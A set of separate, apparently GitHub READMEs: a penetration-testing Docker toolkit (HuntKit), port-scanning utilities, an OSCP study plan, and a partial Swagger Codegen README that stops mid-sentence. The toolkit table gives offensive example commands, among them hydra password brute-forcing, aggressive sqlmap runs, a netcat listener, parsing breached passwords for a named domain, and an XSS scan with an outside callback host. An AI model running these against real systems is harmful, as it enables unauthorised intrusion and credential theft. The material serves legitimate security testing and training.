https://blog.codacy.com/which-python-static-analysis-tools-should-i-use/ Makefiles: https://makefiletutorial.com/ Bash scripting basics: https://linuxconfig.org/bash-scripting-tutorial-for-beginners CommandLineFu.com: http://commandlinefu.com/ C Basics (Complete Basics, see book recommendations for more detail) Interpreted languages vs Compiled languages: https://en.wikipedia.org/wiki/Interpreter_(computing) Program Entry Point: https://en.wikipedia.org/wiki/Entry_point ## Week 13 ### Topics * More C * x86/64 Assembly ## Week 14 ### Topics * Revision * Practice Test ## Week 15 ### Topics * Test ## Week 16 - CVE Presentations
<div align="center"> <img src="https://github.com/mcnamee/huntkit/raw/master/docs/hero.png" alt="HuntKit" style="width:100%" /> <p></p> <sup> <a href="https://hub.docker.com/r/mcnamee/huntkit"> <img src="https://img.shields.io/docker/v/mcnamee/huntkit?style=flat-square" alt="version" /> </a> <a href="/LICENSE"> <img src="https://img.shields.io/github/license/mcnamee/huntkit?style=flat-square" alt="license" /> </a> </sup> <br /> <p align="center"> <a href="#intro"><b>What is this?</b></a> &nbsp;&nbsp;&mdash;&nbsp;&nbsp; <a href="#instructions"><b>Instructions</b></a> &nbsp;&nbsp;&mdash;&nbsp;&nbsp; <a href="#tools"><b>Tools</b></a> </p> <br /> </div> ## What is this? HuntKit is a collection of [penetration testing, bug bounty hunting, capture the flag, red teaming] tools in a single Docker image. Simply run the image and start using the tools. __Why?__ I got sick of waiting for VitualBox to start, Kali to boot, then dealing with the slugish-ness of operating in a VM. I still use Kali for certain tasks. But for a quick nmap scan (for example), using this container is *a lot* quicker. - The tool run very __quick__ (opposed to running inside a VM for example) - Simpler to keep the tools __up to date__ - __Disposable__ - Something broken? Simply prune and start again ## Instructions ### Run from DockerHub ```bash docker run -it mcnamee/huntkit ``` <details> <summary>Advanced usage</summary> ```bash # Advanced: # Line 2: maps ~/Loot to the Docker's /root/loot # Line 3: Allows OpenVPN usage # Line 4: Opens and maps port 4444 (for listeners such as Metasploit) # Line 5: Sets the machine's hostname to huntkit docker run -it \ -v ~/Loot:/root/loot \ --cap-add=NET_ADMIN --device=/dev/net/tun \ -p 4444:4444 \ -h huntkit \ mcnamee/huntkit ``` </details> <details> <summary>(Update) Pull the latest from Docker Hub</summary> ```bash docker pull mcnamee/huntkit ``` </details> <details> <summary>Build it yourself</summary> ```bash # 1. Clone the repo git clone https://github.com/mcnamee/huntkit.git && cd huntkit # 2. Build the image docker build . -t mcnamee/huntkit ``` </details> [![asciicast](https://asciinema.org/a/403549.svg)](https://asciinema.org/a/403549) ## Tools ### Recon | Tool | Description & Example | | --- | --- | | [amass](https://github.com/OWASP/Amass) | _Network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques._ <br>`amass enum -v -src -ip -brute -min-for-recursive 2 -d kali.org` | | [brutespray](https://github.com/x90skysn3k/brutespray) | _Service scanner by bruteforcing._ <br>`brutespray --file nmap.gnmap` | | [cloudflair](https://github.com/christophetd/CloudFlair) | _CloudFlair is a tool to find origin servers of websites protected by CloudFlare who are publicly exposed and don't restrict network access to the CloudFlare IP ranges as they should._ <br> `export CENSYS_API_ID=... && export CENSYS_API_SECRET=...` <br> `cloudflair resound.ly` | | [commix](https://github.com/commixproject/commix) | _Command injection exploiter - used to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks._ <br> `commix --url="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php" --level=3` | | [dalfox](https://github.com/hahwul/dalfox) | _XSS Scanning and Parameter Analysis tool._ <br> `dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123 -b https://hahwul.xss.ht` | | [dirb](https://tools.kali.org/web-applications/dirb) | _Looks for existing (and/or hidden) Web Objects, by launching a dictionary based attack against a web server and analyzing the response._ <br> `dirb https://kali.org $WORDLISTS/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt` | | [dnmasscan](https://github.com/rastating/dnmasscan) | _dnmasscan is a bash script to automate resolving a file of domain names and subsequentlly scanning them using masscan._ <br> `dnmasscan listofdomains.txt dns.log -p80,443 - oG masscan.log` | | [dnsx](https://github.com/projectdiscovery/dnsx) | _Allows you to run multiple probers using retryabledns library, that allows you to perform multiple DNS queries of your choice with a list of user supplied resolvers._ <br> <code>cat domains.txt &#124; dnsx</code> | | [ffuf](https://github.com/ffuf/ffuf) | _A fast web fuzzer._ <br> - `ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401` | | [gau](https://github.com/lc/gau) | _getallurls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain._ <br> - `gau example.com` | | [httpx](https://github.com/projectdiscovery/httpx) | _Take a list of domains and probe for working http and https servers._ <br> <code>cat domains.txt &#124; httpx</code> | | [linkfinder](https://github.com/GerbenJavado/LinkFinder) | _Discover endpoints and their parameters in JavaScript files._ <br> `linkfinder -i https://example.com -d -o cli` | | [masscan](https://github.com/robertdavidgraham/masscan) | _An Internet-scale port scanner._ <br> `masscan -p1-65535 -iL listofips.txt --max-rate 1800 -oG masscan.log` | | [meg](https://github.com/robertdavidgraham/masscan) | _A tool for fetching lots of URLs but still being 'nice' to servers._ <br> `meg paths.txt hosts.txt` | | [nikto](https://tools.kali.org/information-gathering/nikto) | _Web server scanner which performs comprehensive tests against web servers for multiple items (dangerous files, outdated dependencies...)._ <br> `nikto -host=https://kali.org` | | [nmap](https://nmap.org/) | _A utility for network discovery and security auditing_. <br> `nmap -sV 192.168.0.1` | | [nuclei](https://github.com/projectdiscovery/nuclei) | _Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use._. <br> `nuclei -l urls.txt -t $ADDONS/nuclei/ADDONS/nuclei/technologies/ -o ~/projects/results.txt` | | [pagodo](https://github.com/opsdisk/pagodo) | _Passive Google dork script to collect potentially vulnerable web pages and applications on the Internet._. <br> `pagodo -d $DOMAIN -g dorks/sensitive_directories.dorks -l 100 -s -e 35.0 -j 1.1` | | [recon-ng](https://github.com/lanmaster53/recon-ng) | _Web-based open source reconnaissance framework._ <br> `recon-ng` | | [sherlock](https://github.com/sherlock-project/sherlock) | _Hunt down social media accounts by username across social networks._ <br> `sherlock user1 user2 user3` | | [subfinder](https://github.com/projectdiscovery/subfinder) | _Subdomain discovery tool to find valid subdomains for websites by using passive online sources._ <br> `subfinder -d kali.org -v` | | [subjs](https://github.com/lc/subjs) | _Fetches javascript files from a list of URLS or subdomains. Analyzing javascript files can help you find undocumented endpoints, secrets, and more._ <br> <code>cat urls.txt &#124; subjs</code> | | [subjack](https://github.com/haccer/subjack) | _A Subdomain Takeover tool._ <br> `SJFP=$(find "${GOPATH}/pkg" -name fingerprints.json)` <br> `subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -a -c $SJFP` | | [sublist3r](https://github.com/aboul3la/Sublist3r) | _Enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and more._ <br> `sublist3r -d kali.org` | | [sqlmap](http://sqlmap.org/) | _Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers_ <br> `sqlmap -u https://example.com --forms --crawl=10 --level=5 --risk=3` | | [theharvester](https://tools.kali.org/information-gathering/theharvester) | _Gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database._ <br> <code>theharvester -d kali.org -b "bing, certspotter, dnsdumpster, dogpile, duckduckgo, google, hunter, linkedin, linkedin_links, twitter, yahoo"</code> | | [wafw00f](https://github.com/enablesecurity/wafw00f) | _Web Application Firewall Fingerprinting Tool._ <br> `wafw00f resound.ly` | | [whatweb](https://github.com/urbanadventurer/WhatWeb) | _Scans websites and highlights the CMS used, JavaScript libraries, web servers, version numbers, email addresses, account IDs, web framework modules, SQL errors, and more._ <br> `whatweb kali.org` | | [wpscan](https://github.com/wpscanteam/wpscan) | _WordPress Security Scanner._ <br> `wpscan --url kali.org` | | [xsstrike](https://github.com/s0md3v/XSStrike) | _Advanced XSS Detection Suite._ <br> `xsstrike -u="http://192.168.0.115" --data="query"` | ### Exploitation | Tool | Description & Example | | --- | --- | | [breach-parse](https://github.com/hmaverickadams/breach-parse) | _A tool for parsing breached passwords._<br> `breach-parse @tesla.com tesla.txt "~/Downloads/BreachCompilation/data"` | | [crunch](https://tools.kali.org/password-attacks/crunch) | _Wordlist generator where you can specify a standard character set or a character set you specify._ <br> `crunch 6 6 0123456789abcdef -o 6chars.txt` | | [cupp](https://github.com/Mebus/cupp) | _Personal wordlist generator._ <br> `cupp -i` | | [john](https://github.com/magnumripper/JohnTheRipper) | _John the Ripper is a fast password cracker._ <br> `zip2john filename.zip > hash.txt`<br> `john hash.txt` | | [jwttool](https://github.com/ticarpi/jwt_tool) | _A toolkit for validating, forging and cracking JWTs (JSON Web Tokens)._ <br> `jwttool eyJ0eXAiOiJ.eyJsb2dpbi.aqNCvShlN -A` | | [metasploit](https://tools.kali.org/exploitation-tools/metasploit-framework) | _A penetration testing platform that enables you to find, exploit, and validate vulnerabilities.._ <br> `msfconsole` | | [hydra](https://tools.kali.org/password-attacks/hydra) | <code>hydra -f -l [email protected] -P $WORDLISTS/seclists/Passwords/darkweb2017-top1000.txt website.com http-post-form "/login:user=^USER^&pass=^PASS^:Failed"</code> | | [netcat](http://netcat.sourceforge.net/) | _A networking utility which reads and writes data across network connections, using the TCP/IP protocol._ <br> `nc -nvlp 1234` | | [searchsploit](https://tools.kali.org/exploitation-tools/exploitdb) | _Searchable archive from The Exploit Database._ <br> `searchsploit oracle windows remote` | | [setoolkit](https://www.trustedsec.com/tools/the-social-engineer-toolkit-set/) | _Social Engineering Toolkit._ <br> `setoolkit` | ### Other | Tool | Description | | --- | --- | | FTP | _Connect to an FTP server._ <br> `ftp ftp.google.com` | | [Go](https://golang.org/) | The Go programming language | | [Interlace](https://github.com/codingo/Interlace) | _Easily turn single threaded command line applications into a fast, multi-threaded application._ <br> `interlace -tL targets.txt -threads 5 -c "gobuster dns -d _target_ -w wordlist.txt --noprogress --quiet >> _target_.txt" -v` | | [NodeJS](https://nodejs.org/) | _Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine._ | | [Oh My Zsh](https://ohmyz.sh/) | _Zsh is a framework for managing your zsh configuration, bundled with thousands of helpful functions, helpers, plugins, themes._ | | [OpenVPN](https://openvpn.net/) | _Connect to a VPN._ <br> Add `--cap-add=NET_ADMIN --device=/dev/net/tun` to the `docker run` to use OpenVPN. | | [Perl](https://www.perl.org/) | _Perl is a highly capable, feature-rich programming language with over 30 years of development._ | | [PHP](https://www.php.net/) | _The PHP scripting language._ | | [Proxychains](https://github.com/haad/proxychains) | _Redirects connections through SOCKS4a/5 or HTTP proxies._ | | [Python 3](https://www.python.org/) | _The Python programming language_ | | [Ruby](https://www.ruby-lang.org/) | _A dynamic, open source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write._ | | [smbclient](https://installlion.com/kali/kali/main/s/smbclient/install/index.html) | `smbclient \\192.168.0.45\Media` | | [Tor](https://www.torproject.org/) | _Browse Privately._ | | [tmux](https://github.com/tmux/tmux/wiki) | _tmux is a terminal multiplexer. It lets you switch easily between several programs in one terminal, detach them (they keep running in the background) and reattach them to a different terminal._ <br>`CNTR+b c` Create window <br>`CNTR+b n` Switch to next window | | [unfurl](https://github.com/tomnomnom/unfurl) | _Pull out bits of URLs provided on stdin._ <br> <code>cat urls.txt &#124; unfurl --unique domains</code> | | [zsh](https://www.zsh.org/) | _Zsh is an extended Bourne shell with many improvements, including some features of Bash, ksh, and tcsh._ | <!-- END --> ## Wordlists - Amass - Dirb - Kali's `rockyou.txt` - Metasploit - The Harvester - [SecLists](https://github.com/danielmiessler/SecLists)
# 3pScan ## Features - Simple tool for port scan ## Installation ```sh go install -v github.com/tangxiaofeng7/3pScan@latest ``` ## Usage ```console Simple: 3pScan -h baidu.com -top 1000 Scan with disable ping: 3pScan -h baidu.com -Pn -top 1000 Scan with read file: 3pScan -hf url.txt -top 1000 Scan with full ports: 3pScan -h baidu.com -top full or 3pScan -h baidu.com -p 1-65535 Scan with show stats: 3pScan -h baidu.com -p 1-65535 -t 10 Scan with other tools: httpx: 3pScan -h baidu.com -top 1000 | httpx -silent -title -status-code nuclei: 3pScan -h baidu.com -top 1000 | nuclei subfinder: echo baidu.com | subfinder -silent | 3pScan -top 1000 ```
# nmapbar A Little program in Ruby that adds a progress bar to Nmap and enhances output, making it easier to identify open ports. ![](https://user-images.githubusercontent.com/51126823/102024029-1d2b3580-3d6e-11eb-807a-1f681d7d2a2a.gif) ## Installation Install tty-progressbar ```$ gem install tty-progressbar``` Install Pastel for colors =DD ```$ gem install pastel``` Install ```git clone https://github.com/Mr-P4p3r/nmapbar.git``` ## Usage With only two switches the use is very simple. ``` ruby nmapbar.rb -[switch] TARGET -s It will run a well-balanced scan, suitable for most situations,. Nmap will run with theses flags enabled -sC -sV -n -c It will run a complete scan, but much slower. Nmap will run with these flags enabled -A -p- -n Example: ruby nmapbar.rb -s 10.0.14.5 ``` The result of every scan is saved in the same folder of the program, using as name the ip of the target.txt
# Oscp study Notes of my Offensive Security Certified Professional (OSCP) study plan. **Last update**: 2019-04-10 ## OSCP-like VMs on Vulnhub: - Beginner friendly: - Kioptrix: Level 1 (#1) [ok] - Kioptrix: Level 1.1 (#2) [ok] - Kioptrix: Level 1.2 (#3) [ok] - Kioptrix: Level 1.3 (#4) [ok] - FristiLeaks: 1.3 [ok] - Stapler: 1 [ok] - PwnLab: init [ok] - Pluck: 1 [ok] - W1R3S: 1.0.1 [ok] - Intermediate: - Kioptrix: 2014 [ok] - Brainpan: 1 (Part 1 of BO is relevant to OSCP. egghunting is out of scope though) - Mr-Robot: 1 [ok] - HackLAB: Vulnix [ok] - Not so sure (Didn't solve them yet): - VulnOS: 2 [ok] - SickOs: 1.2 [ok] - /dev/random: scream - pWnOS: 2.0 - SkyTower: 1 - IMF - Lord of the Root 1.0.1 [ok] - Tr0ll - Pegasus - SkyTower [ok] - Windows - Metasploitable 3 - Bobby: 1 (Uses VulnInjector, need to provide you own ISO and key.) (credits for **@abatchy**) Link to download VMs: http://vulnhub.com ## Hackthebox.eu (HTB) I strongly recommend the boxes on the <a href="http://hackthebox.eu"> hackthebox.eu</a> to study for OSCP cert. HTB has a good set of windows boxes to training: **Devel**, **Optimum**, **Bastard**, **Grandpa**, **Blue**, **Sizzle**, **Reel**. My hackthebox profile: https://www.hackthebox.eu/profile/5823. Feel free to contact me there :) *PS: It's needed to solve a little "challenge" to obtain the invite.* ## Recommended books: <a href="https://www.amazon.com.br/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641">Penetration Testing: A Hands-On Introduction to Hacking</a> (+Highly recommended for beginners) <a href="https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/ref=sr_1_1?ie=UTF8&qid=1492297164&sr=8-1&keywords=hacking">Hacking: The Art of Exploitation, 2nd Edition</a> <a href="https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=sr_1_2?ie=UTF8&qid=1492297153&sr=8-2&keywords=pentest">Rtfm: Red Team Field Manual</a> <a href="https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/ref=sr_1_1?ie=UTF8&qid=1492297179&sr=8-1&keywords=the+web+application+hacker%27s+handbook">The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws</a> <a href="https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing-ebook/dp/B00J5S9OPU">The Hacker Playbook: Practical Guide To Penetration Testing</a> ## Stack-based buffer overflow links [must-read]: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ [Recommended] http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1.html https://raw.githubusercontent.com/m0nad/Papers/master/buffer_overflow_iniciantes.txt [PT-BR] ## Other interesting links: https://forum.hackthebox.eu/discussion/1655/oscp-exam-review-2019-notes-gift-inside/p1 [+ EXCELLENT tool from @21y4d to enumeration... I really recommend it :) ] https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ [Linux privilege escalation] http://www.fuzzysecurity.com/tutorials/16.html [Windows privilege escalation] http://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob.html https://www.securitysift.com/offsec-pwb-oscp/ [+Scripts] http://hackingandsecurity.blogspot.com.br/2016/04/oscp-related-notes.html http://rtfm-ctf.org/2017/PWN-PATH-TO-OSCP http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html [RECOMMENDED reading] https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/ ## My write-ups <a href="https://ferreirasc.github.io/post/kioptrix_level_1/">Kioptrix level 1</a> <a href="https://ferreirasc.github.io/post/kioptrix_level_1_1/">Kioptrix level 1.1 </a> <a href="https://ferreirasc.github.io/post/kioptrix_level_1_2/">Kioptrix level 1.2 </a>
# Swagger Code Generator - Master (2.3.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea) [![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu) [![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen) - 3.0.0: [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/3.0.0.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea/3.0.0.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea) [![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=3.0.0&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu) [![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen/tree/3.0.0.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project) [![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen) :star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22).:star::star::star: :notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover: :warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning: :rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket: ## Overview This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported: - **API clients**: **ActionScript**, **Ada**, **Apex**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Eiffel**, **Erlang**, **Go**, **Groovy**, **Haskell** (http-client, Servant), **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign, RestTemplate, RESTEasy, Vertx, Google API Client Library for Java), **Kotlin**, **Lua**, **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **PowerShell**, **Python**, **R**, **Ruby**, **Rust**, **Scala** (akka, http4s, swagger-async-httpclient), **Swift** (2.x, 3.x, 4.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node) - **Server stubs**: **C#** (ASP.NET Core, NancyFx), **C++** (Pistache, Restbed), **Erlang**, **Go**, **Haskell** (Servant), **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy, Play Framework), **PHP** (Lumen, Slim, Silex, [Symfony](https://symfony.com/), [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Rust**, **Scala** ([Finch](https://github.com/finagle/finch), [Lagom](https://github.com/lagom/lagom), Scalatra) - **API documentation generators**: **HTML**, **Confluence Wiki** - **Configuration files**: [**Apache2**](https://httpd.apache.org/) - **Others**: **JMeter** Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project. # Table of contents - [Swagger Code Generator](#swagger-code-generator) - [Overview](#overview) - [Table of Contents](#table-of-contents) - Installation - [Compatibility](#compatibility) - [Prerequisites](#prerequisites) - [OS X Users](#os-x-users) - [Building](#building) - [Docker](#docker) - [Development in Docker](#development-in-docker) - [Run docker in Vagrant](#run-docker-in-vagrant) - [Public Docker image](#public-docker-image) - [Homebrew](#homebrew) - [Getting Started](#getting-started) - Generators - [To generate a sample client library](#to-generate-a-sample-client-library) - [Generating libraries from your server](#generating-libraries-from-your-server) - [Modifying the client library format](#modifying-the-client-library-format) - [Making your own codegen modules](#making-your-own-codegen-modules) - [Where is Javascript???](#where-is-javascript) - [Generating a client from local files](#generating-a-client-from-local-files) - [Customizing the generator](#customizing-the-generator) - [Validating your OpenAPI Spec](#validating-your-openapi-spec) - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation) - [Generating static html api documentation](#generating-static-html-api-documentation) - [To build a server stub](#to-build-a-server-stub) - [To build the codegen library](#to-build-the-codegen-library) - [Workflow Integration](#workflow-integration) - [Maven Integration](#maven-integration) - [Gradle Integration](#gradle-integration) - [Github Integration](#github-integration) - [Online Generators](#online-generators) - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution) - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen) - [Presentations/Videos/Tutorials/Books](#presentationsvideostutorialsbooks) - [Swagger Codegen Core Team](#swagger-codegen-core-team) - [Swagger Codegen Technical Committee](#swagger-codegen-technical-committee) - [License](#license) ## Compatibility The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification: Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes -------------------------- | ------------ | -------------------------- | ----- 3.0.0 (upcoming major release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/3.0.0-SNAPSHOT/)| TBD | 1.0, 1.1, 1.2, 2.0, 3.0 | Major release with breaking changes 2.3.0 (current master, upcoming minor release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/2.3.0-SNAPSHOT/)| Jul/Aug 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes [2.2.3](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.3) (**current stable**) | 2017-07-15 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.3](https://github.com/swagger-api/swagger-codegen/tree/v2.2.3) [2.2.2](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.2) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2) [2.2.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.1) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1) [2.1.6](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.1.6) | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6) 2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/2.0.17) 1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1) ### Prerequisites If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum): ```sh wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.3/swagger-codegen-cli-2.2.3.jar -O swagger-codegen-cli.jar java -jar swagger-codegen-cli.jar help ``` For Windows users, you will need to install [wget](http://gnuwin32.sourceforge.net/packages/wget.htm) or you can use Invoke-WebRequest in PowerShell (3.0+), e.g. `Invoke-WebRequest -OutFile swagger-codegen-cli.jar http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.3/swagger-codegen-cli-2.2.3.jar` On a mac, it's even easier with `brew`: ```sh brew install swagger-codegen ``` To build from source, you need the following installed and available in your $PATH: * [Java 7 or 8](http://java.oracle.com) * [Apache maven 3.3.3 or greater](http://maven.apache.org/) #### OS X Users Don't forget to install Java 7 or 8. You probably have 1.6. Export JAVA_HOME in order to use the supported Java version: ```sh export JAVA_HOME=`/usr/libexec/java_home -v 1.8` export PATH=${JAVA_HOME}/bin:$PATH ``` ### Building After cloning the project, you can build it from source with this command: ```sh mvn clean package ``` ### Homebrew To install, run `brew install swagger-codegen` Here is an example usage: ```sh swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/ ``` ### Docker #### Development in docker You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen` in the docker container. It also maps `~/.m2/repository` to the appropriate container location. To execute `mvn package`: ```sh git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen ./run-in-docker.sh mvn package ``` Build artifacts are now accessible in your working directory. Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example: ```sh ./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli ./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli ./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client ./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \ -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore ``` #### Run Docker in Vagrant Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads). ```sh git clone http://github.com/swagger-api/swagger-codegen.git cd swagger-codegen vagrant up vagrant ssh cd /vagrant ./run-in-docker.sh mvn package ``` #### Public Pre-built Docker images - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service) - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI) ##### Swagger Generator Docker Image The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code. Example usage (note this assumes `jq` is installed for command line processing of JSON): ```sh # Start container and save the container id CID=$(docker run -d swaggerapi/swagger-generator) # allow for startup sleep 5 # Get the IP of the running container GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID) # Execute an HTTP request and store the download link RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" }' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"') # Download the generated zip and redirect to a file curl $RESULT > result.zip # Shutdown the swagger generator image docker stop $CID && docker rm $CID ``` In the example above, `result.zip` will contain the generated client. ##### Swagger Codegen CLI Docker Image The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version. To generate code with this image, you'll need to mount a local location as a volume. Example: ```sh docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l go \ -o /local/out/go ``` The generated code will be located under `./out/go` in the current directory. ## Getting Started To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following ```sh git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen mvn clean package java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l php \ -o /var/tmp/php_api_client ``` (if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`) You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.3/swagger-codegen-cli-2.2.3.jar) To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate` To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php` ## Generators ### To generate a sample client library You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows: ```sh ./bin/java-petstore.sh ``` (On Windows, run `.\bin\windows\java-petstore.bat` instead) This will run the generator with this command: 